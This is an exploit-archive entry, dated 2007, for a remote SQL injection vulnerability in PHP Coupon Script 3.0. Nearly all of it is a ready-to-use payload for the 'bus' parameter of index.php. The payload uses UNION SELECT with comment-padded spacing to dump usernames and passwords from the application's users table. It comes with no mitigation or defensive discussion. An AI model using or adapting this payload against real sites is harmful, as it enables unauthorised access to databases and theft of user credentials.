id: 1820
date: 05/02/2007
title: PHP Coupon Script 3.0 (index.php bus) Remote SQL Injection Vulnerability
author: xoron
cves: 

========================================================================
PHP Coupon Script 3.0 (index.php bus) Remote SQL Injection Vulnerability
========================================================================


==============================================

PHP Coupon Script 3.0 Remote SQL Injection

==============================================

Script site: http://www.couponscript.com/

==============================================

Exploit:
index.php?page=viewbus&bus=-1/**/union/**/select/**/null,null,null,username,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from/**/users/*

==============================================



#  0day.today [2023-03-23]  #